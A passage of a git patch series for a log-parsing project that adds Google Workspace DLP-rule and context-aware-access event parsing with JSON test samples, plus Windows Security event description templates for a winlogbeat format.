"network.application", + "value": "rules" + }, + { + "field": "event.action", + "value": "action_complete" + }, + { + "field": "google.report.rule.severity" + }, + { + "field": "google.report.rule.name" + }, + { + "field": "google.report.rule.data_source" + }, + { + "field": "google.report.rule.type" + } + ] + }, + { + "value": "The {google.report.rule.type} content was matched with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", + "conditions": [ + { + "field": "network.application", + "value": "rules" + }, + { + "field": "event.action", + "value": "content_matched" + }, + { + "field": "google.report.rule.severity" + }, + { + "field": "google.report.rule.name" + }, + { + "field": "google.report.rule.data_source" + }, + { + "field": "google.report.rule.type" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..e9640ba28 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -28,6 +28,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "admin"}}' - name: set_vault_fields filter: '{{ json_event.message.id.applicationName == "vault"}}' + - name: set_rules_fields + filter: '{{ json_event.message.id.applicationName == "rules"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' @@ -258,3 +260,24 @@ stages: {%- endif -%} {% endfor %} {{ types|unique|list }} + + set_rules_fields: + actions: + - set: + google.report.rule.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_name" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_type" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.data_source: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "data_source" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.scan_type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "scan_type" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.severity: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "severity" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["info"] + filter: '{{ json_event.message.events[0].name in ["action_complete", "label_applied", "rule_trigger", "rule_match", "content_matched"]}}' + + - set: + event.type: ["deletion"] + filter: '{{ json_event.message.events[0].name == "label_removed"}}' + + - set: + event.type: ["change"] + filter: '{{ json_event.message.events[0].name == "label_field_value_changed"}}' diff --git a/Google Cloud/google-report/tests/test_rules_sample_1.json b/Google Cloud/google-report/tests/test_rules_sample_1.json new file mode 100644 index 000000000..3f7ef889b --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_1.json @@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "action_complete", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "113328670183616666666", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_rules_sample_2.json b/Google Cloud/google-report/tests/test_rules_sample_2.json new file mode 100644 index 000000000..f7a1e9bf9 --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_2.json @@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "content_matched", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "11332867018361686666666", + "name": "john.doe" + } + } +} \ No newline at end of file From 8bcde47c77e71b93d99f114695639467987b3d16 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Thu, 14 Nov 2024 16:42:34 +0100 Subject: [PATCH 038/150] Add context access service --- Google Cloud/google-report/_meta/fields.yml | 5 ++ .../_meta/smart-descriptions.json | 18 ++++++ Google Cloud/google-report/ingest/parser.yml | 10 ++++ .../tests/test_access_sample_1.json | 58 +++++++++++++++++++ 4 files changed, 91 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_access_sample_1.json diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 84b0db0f6..4fc31cc4b 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -1,3 +1,8 @@ +google.report.access.application: + description: Application name + name: google.report.access.application + type: keyword + google.report.actor.email: description: '' name: google.report.actor.email diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6a934ee3d..51fcc1837 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -168,6 +168,24 @@ } ] }, + { + "value": " Access to {google.report.access.application} was denied for {user.email} : {event.action}", + "conditions": [ + { + "field": "network.application", + "value": "context_aware_access" + }, + { + "field": "user.email" + }, + { + "field": "event.action" + }, + { + "field": "google.report.access.application" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..25f2888b2 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -1,4 +1,5 @@ name: google-report +ignored_values: ["UNKNOWN"] pipeline: - name: json_event external: @@ -28,6 +29,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "admin"}}' - name: set_vault_fields filter: '{{ json_event.message.id.applicationName == "vault"}}' + - name: set_context_aware_fields + filter: '{{ json_event.message.id.applicationName == "context_aware_access"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' @@ -258,3 +261,10 @@ stages: {%- endif -%} {% endfor %} {{ types|unique|list }} + + set_context_aware_fields: + actions: + - set: + event.type: ["denied"] + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}' + google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}' diff --git a/Google Cloud/google-report/tests/test_access_sample_1.json b/Google Cloud/google-report/tests/test_access_sample_1.json new file mode 100644 index 000000000..e83076db1 --- /dev/null +++ b/Google Cloud/google-report/tests/test_access_sample_1.json @@ -0,0 +1,58 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "event": { + "action": "MONITOR_MODE_ACCESS_DENY_EVENT", + "dataset": "admin#reports#activity", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-11-07T14:23:22.470000Z", + "cloud": { + "account": { + "id": "C02i38lll" + } + }, + "google": { + "report": { + "access": { + "application": "GMAIL" + }, + "actor": { + "email": "john.doe@test.com" + } + } + }, + "network": { + "application": "context_aware_access" + }, + "related": { + "ip": [ + "9.3.2.1" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "9.3.2.1", + "ip": "9.3.2.1" + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "117564289545555555555", + "name": "john.doe" + } + } +} \ No newline at end of file From 4f2e1bfea597d812bf2dcb478bebdc59684e770d Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 16:57:21 +0100 Subject: [PATCH 039/150] Updated smart descriptions --- .../winlogbeat/_meta/smart-descriptions.json | 1129 +++++++++++++++++ 1 file changed, 1129 insertions(+) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index eb6a595a2..5eaf6dc64 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -1,4 +1,1133 @@ [ + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetUserSid} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserSid", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged off from {host.hostname}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged off from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4634 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {action.properties.TargetServerName} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.TargetServerName", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {host.hostname} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.TargetServerName", + "value": "localhost" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} accessed the object {action.properties.ObjectName} on {host.hostname}", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "action.properties.ObjectName", + "type": "accessed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4662 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed {process.command_line} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "user.name", + "target": "process.parent.executable", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "jost.hostname", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.executable", + "target": "host.hostname", + "type": "executed on" + }, + { + "source": "process.parent.executable", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4688 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Process {process.name} exited. It was executed by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.executable", + "type": "executed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4689 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "created account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4720 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "enabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4722 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} changed their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "changed their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to change their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "failed to change their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} disabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "disabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4725 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} deleted account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "deleted account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4726 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4727 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4742 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created security-disabled local group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created security-disabled local group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4744 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about the security-disabled global group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4750 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to authenticate from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to log authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} successfully authenticated from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "authenticated from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was denied a service ticket for {action.properties.ServiceName} from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was denied a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was granted a service ticket for {action.properties.ServiceName} from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was granted a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": 